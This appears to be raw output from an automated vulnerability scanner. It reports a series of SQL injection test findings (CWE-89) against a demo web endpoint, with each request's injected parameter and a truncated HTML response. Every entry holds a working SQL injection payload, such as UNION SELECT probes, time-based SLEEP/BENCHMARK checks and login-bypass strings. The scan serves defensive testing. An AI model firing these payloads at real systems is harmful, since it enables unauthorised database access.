href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1198Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1199\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1200\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1201\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1202\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1' ORDER BY 1,2--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1203\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1204\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -- or #\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1205\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1206\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1207\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)\n+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1208\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1209\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin'/*ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1210\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1211Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or '1'='1'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You 